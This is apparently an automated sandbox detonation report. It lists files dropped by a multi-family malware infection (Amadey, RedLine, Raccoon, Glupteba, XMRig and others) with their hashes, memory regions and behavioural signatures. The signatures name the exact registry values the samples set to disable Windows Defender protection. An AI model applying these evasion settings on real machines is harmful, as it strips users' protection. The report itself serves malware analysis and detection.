SHA512 142ca76bc32cc60c11f640bd9e050df6000b6824a192595416f661d22d6e52704dfd369974d7f2f73d01eaa356237c50778737d72d5588c5a2ff8a8010ee8101

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 89c82822be2e2bf37b5d80d575ef2ec8
SHA1 9fe2fad2faff04ad5e8d035b98676dedd5817eca
SHA256 6fea30b9d17eacffde43b727058b5b2c422a7b70407534549042ba7b20d5f8c9
SHA512 142ca76bc32cc60c11f640bd9e050df6000b6824a192595416f661d22d6e52704dfd369974d7f2f73d01eaa356237c50778737d72d5588c5a2ff8a8010ee8101

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 89c82822be2e2bf37b5d80d575ef2ec8
SHA1 9fe2fad2faff04ad5e8d035b98676dedd5817eca
SHA256 6fea30b9d17eacffde43b727058b5b2c422a7b70407534549042ba7b20d5f8c9
SHA512 142ca76bc32cc60c11f640bd9e050df6000b6824a192595416f661d22d6e52704dfd369974d7f2f73d01eaa356237c50778737d72d5588c5a2ff8a8010ee8101

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

memory/1692-286-0x0000000001250000-0x0000000001258000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

memory/528-298-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

memory/2920-304-0x0000000074670000-0x0000000074D5E000-memory.dmp

memory/2980-306-0x00000000008A4000-0x00000000008B7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

memory/528-303-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/2980-307-0x0000000000220000-0x0000000000229000-memory.dmp

memory/2512-308-0x0000000002620000-0x0000000002A18000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 18033f40d822613793a87ea37c266bb0
SHA1 c4e9c9f558365f3a2d68ff34830e24650046ee77
SHA256 0dadfa865cf7d0a4588178cce5143953195cff5049f9de32a8e4c9bd82e3ff79
SHA512 7077536a5d51336bca1cd9a996dc0f5c3e516c20d708be2a95266267f7e1c1e365a0720eb858dfff09bb8c934b6844e1cbd3f535292a6da281003fc9ab8ca1ae

C:\Users\Admin\AppData\Local\Temp\DFED.exe

MD5 e2ff8a34d2fcc417c41c822e4f3ea271
SHA1 926eaf9dd645e164e9f06ddcba567568b3b8bb1b
SHA256 4f26511d40ad3d781ff1bd4c643f9418b3fd0c4da6b769a1ff9ae4d07d8892d0
SHA512 823d99704b761218b3de8f6b107378b529e7f718557b9e2b57ffb497310c4eccfc35c402bad28cdc2758ef254e55a936949c24468f07fc21e7e3efc0671beec2

C:\Users\Admin\AppData\Local\Temp\DFED.exe

MD5 e2ff8a34d2fcc417c41c822e4f3ea271
SHA1 926eaf9dd645e164e9f06ddcba567568b3b8bb1b
SHA256 4f26511d40ad3d781ff1bd4c643f9418b3fd0c4da6b769a1ff9ae4d07d8892d0
SHA512 823d99704b761218b3de8f6b107378b529e7f718557b9e2b57ffb497310c4eccfc35c402bad28cdc2758ef254e55a936949c24468f07fc21e7e3efc0671beec2

memory/1544-328-0x00000000000E0000-0x00000000004C0000-memory.dmp

memory/1208-346-0x0000000002BA0000-0x0000000002BB6000-memory.dmp

memory/528-347-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1692-368-0x000007FEF5E50000-0x000007FEF683C000-memory.dmp

memory/2512-369-0x0000000002620000-0x0000000002A18000-memory.dmp

memory/2512-370-0x0000000002A20000-0x000000000330B000-memory.dmp

memory/1692-371-0x000000001B070000-0x000000001B0F0000-memory.dmp

memory/2512-372-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1544-373-0x0000000074670000-0x0000000074D5E000-memory.dmp

memory/2404-374-0x0000000004560000-0x00000000045A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EC8B.exe

MD5 358dc0342427670dcd75c2542bcb7e56
SHA1 5b70d6eb8d76847b6d3902f25e898c162b2ba569
SHA256 45d1df2aa5755f65a6710f2a4652bedc72f099ff53cb69301aac9a5518276e60
SHA512 2fff83f04c11e8e99817b9a9c173d29d9d4169805872706dd765a1891157960a7e46cd30a40cedd43de5521d96070a67f6eaea18c53d796c294b386bc5b356e5

C:\Users\Admin\AppData\Local\Temp\EC8B.exe

MD5 358dc0342427670dcd75c2542bcb7e56
SHA1 5b70d6eb8d76847b6d3902f25e898c162b2ba569
SHA256 45d1df2aa5755f65a6710f2a4652bedc72f099ff53cb69301aac9a5518276e60
SHA512 2fff83f04c11e8e99817b9a9c173d29d9d4169805872706dd765a1891157960a7e46cd30a40cedd43de5521d96070a67f6eaea18c53d796c294b386bc5b356e5

memory/2940-388-0x0000000000220000-0x000000000025E000-memory.dmp

memory/2940-393-0x0000000000400000-0x0000000000461000-memory.dmp

memory/2940-394-0x0000000074670000-0x0000000074D5E000-memory.dmp

\Users\Admin\AppData\Local\Temp\EC8B.exe

MD5 358dc0342427670dcd75c2542bcb7e56
SHA1 5b70d6eb8d76847b6d3902f25e898c162b2ba569
SHA256 45d1df2aa5755f65a6710f2a4652bedc72f099ff53cb69301aac9a5518276e60
SHA512 2fff83f04c11e8e99817b9a9c173d29d9d4169805872706dd765a1891157960a7e46cd30a40cedd43de5521d96070a67f6eaea18c53d796c294b386bc5b356e5

\Users\Admin\AppData\Local\Temp\EC8B.exe

MD5 358dc0342427670dcd75c2542bcb7e56
SHA1 5b70d6eb8d76847b6d3902f25e898c162b2ba569
SHA256 45d1df2aa5755f65a6710f2a4652bedc72f099ff53cb69301aac9a5518276e60
SHA512 2fff83f04c11e8e99817b9a9c173d29d9d4169805872706dd765a1891157960a7e46cd30a40cedd43de5521d96070a67f6eaea18c53d796c294b386bc5b356e5

C:\Users\Admin\AppData\Local\Temp\EC8B.exe

MD5 358dc0342427670dcd75c2542bcb7e56
SHA1 5b70d6eb8d76847b6d3902f25e898c162b2ba569
SHA256 45d1df2aa5755f65a6710f2a4652bedc72f099ff53cb69301aac9a5518276e60
SHA512 2fff83f04c11e8e99817b9a9c173d29d9d4169805872706dd765a1891157960a7e46cd30a40cedd43de5521d96070a67f6eaea18c53d796c294b386bc5b356e5

memory/112-464-0x000000013FFA0000-0x0000000140541000-memory.dmp

memory/2028-481-0x0000000000280000-0x000000000029E000-memory.dmp

memory/2028-486-0x0000000074670000-0x0000000074D5E000-memory.dmp

memory/2028-489-0x0000000000310000-0x0000000000350000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7TVQOT0Y\hLRJ1GG_y0J[1].ico

MD5 8cddca427dae9b925e73432f8733e05a
SHA1 1999a6f624a25cfd938eef6492d34fdc4f55dedc
SHA256 89676a3fb8639d6531c525e5800ff4cc44d06d27ff5607922d27e390eb5b6e62
SHA512 20fbee2886995c253e762f2bb814ad16890b0989deab4d92394363ef0060b96a634d87c380c7ba1b787a8ab312be968fed9329a729b4e0d64235a09e397db740

memory/1544-523-0x0000000000810000-0x000000000081A000-memory.dmp

memory/1692-524-0x000007FEF5E50000-0x000007FEF683C000-memory.dmp

memory/1692-525-0x000000001B070000-0x000000001B0F0000-memory.dmp

memory/2512-526-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1544-527-0x0000000000820000-0x0000000000828000-memory.dmp

memory/1544-528-0x0000000005030000-0x00000000051C2000-memory.dmp

memory/2512-529-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2940-533-0x0000000074670000-0x0000000074D5E000-memory.dmp

memory/1544-534-0x0000000004FF0000-0x0000000005030000-memory.dmp

memory/1544-535-0x0000000004FF0000-0x0000000005030000-memory.dmp

memory/1544-536-0x0000000000A70000-0x0000000000A80000-memory.dmp

memory/1544-537-0x0000000004FF0000-0x0000000005030000-memory.dmp

memory/2028-546-0x0000000074670000-0x0000000074D5E000-memory.dmp

memory/2028-547-0x0000000000310000-0x0000000000350000-memory.dmp

memory/1544-548-0x0000000004FF0000-0x0000000005030000-memory.dmp

memory/1544-549-0x0000000004FF0000-0x0000000005030000-memory.dmp

memory/1544-550-0x0000000005460000-0x0000000005560000-memory.dmp

memory/1544-551-0x0000000004FF0000-0x0000000005030000-memory.dmp

memory/1544-561-0x0000000004FF0000-0x0000000005030000-memory.dmp

memory/1624-570-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1624-572-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1624-574-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1624-577-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1624-579-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1624-581-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1624-583-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1544-584-0x0000000074670000-0x0000000074D5E000-memory.dmp

memory/1624-595-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp3E71.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmp3E87.tmp

MD5 bb18dcba6963f64dfb434e83255c7a5e
SHA1 5bf0d53e721eb40ab8172a1134d1657b9d40e4d7
SHA256 d020d662d980b19b1a21f7f6860e8e7958f96d797c939a5fee1d13845c0f3b6b
SHA512 a898203234fbf1b75a5c1fc224b25273a39391563e8048b8dc8b798aff34e6910defbe4f7067afaa7eb764473818489d91adcc2c4a4f4f099e656c9a0640d67d

memory/2512-674-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1688-680-0x000000001B180000-0x000000001B462000-memory.dmp

memory/1688-681-0x000007FEEEAE0000-0x000007FEEF47D000-memory.dmp

memory/1688-682-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/1688-683-0x000007FEEEAE0000-0x000007FEEF47D000-memory.dmp

memory/1688-684-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/1688-685-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/1688-686-0x0000000002410000-0x0000000002418000-memory.dmp

memory/2028-687-0x0000000074670000-0x0000000074D5E000-memory.dmp

memory/1624-688-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1688-689-0x00000000026A0000-0x0000000002720000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

memory/1688-695-0x000007FEEEAE0000-0x000007FEEF47D000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LMFNFTGD0QX2ZEBHOO3M.temp

MD5 ce5af06dbf124f8054648e95e152478a
SHA1 137d5d340c1c7e57d7243c02a82710c81b6e412b
SHA256 6f42e1094a4aa17930875c23f3779d5dba6d66ad13dcd8ac9ee650dcd779fd53
SHA512 6e84efdf3754a8b4964f0a043efae9125980ba1c126cd2f3fe21c08e73060459de8bc2eaf63383d7aee13723b7325887bb740d0cbed8955a24501707b39f228f

memory/2800-707-0x000000001B0C0000-0x000000001B3A2000-memory.dmp

memory/2800-708-0x000007FEEE140000-0x000007FEEEADD000-memory.dmp

memory/2512-717-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/112-720-0x000000013FFA0000-0x0000000140541000-memory.dmp

memory/2512-721-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2624-722-0x0000000002680000-0x0000000002A78000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/2624-732-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2696-744-0x00000000028B0000-0x0000000002CA8000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8413e739bdc8a11d0981f0f37d2e1531
SHA1 431352f978017f03ec56812bc38755d3188b747a
SHA256 fcc692bf55a878f17ee1004e50b77e64366f3b0c279773e6e87a836c28fc9e63
SHA512 f0796bb0c07ef88494c53c7b2abe61b17629703ae110c56d723142609c68e3d0cb0ed0319cc71b58fc511903cf326e13b8e67fbd41957d9c11a5815130841e25

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e777fb88946b3b6b64913336f6a64a36
SHA1 1db11c0b8ac11bf6060b59371fb0de260c0db03e
SHA256 0644dcdea3e7bf8d43527d19e104a68beeee21c2a0dc9166bfe3990d5bcfd09c
SHA512 65b26da2ae477319488d56f41d4b704a9da6c92048b48a21c5ad8aefd9c087901f52078868b37af3bec78eb150da0fc47f40238529bab79e2c8a30ff22088143

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8e9d4d2ae23cab6747da9c5e889b17e4
SHA1 807fd3cf95a1db89b7abb6c5ff42b4289f422235
SHA256 d68f6de986936b72d0f2dd99b751886d1f263dca8242615f7e5a648c8abe792c
SHA512 798cca4368a6372867af991b2c57334bf698ca6edc1e374ef4204e87356eb3264c21016d8b13c4bb88ec8f8f9365b4cdb0f7cab98cf28a7f1c19a5f6092a581c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8e9d4d2ae23cab6747da9c5e889b17e4
SHA1 807fd3cf95a1db89b7abb6c5ff42b4289f422235
SHA256 d68f6de986936b72d0f2dd99b751886d1f263dca8242615f7e5a648c8abe792c
SHA512 798cca4368a6372867af991b2c57334bf698ca6edc1e374ef4204e87356eb3264c21016d8b13c4bb88ec8f8f9365b4cdb0f7cab98cf28a7f1c19a5f6092a581c

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7TVQOT0Y\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

memory/2428-933-0x000000013F860000-0x000000013FE01000-memory.dmp

memory/2696-934-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2696-940-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

Analysis: behavioral2

Detonation Overview

Submitted: 2023-10-31 03:11

Reported: 2023-10-31 03:14

Platform: win10v2004-20231020-en

Max time kernel: 90s

Max time network: 156s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\F0A.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\DB23.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\F15C.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\D561.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D61D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D9D8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DB23.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DD37.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F15C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F2C4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\14C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F0A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\138F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe N/A
N/A N/A C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F0A.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F0A.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F0A.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F0A.exe N/A
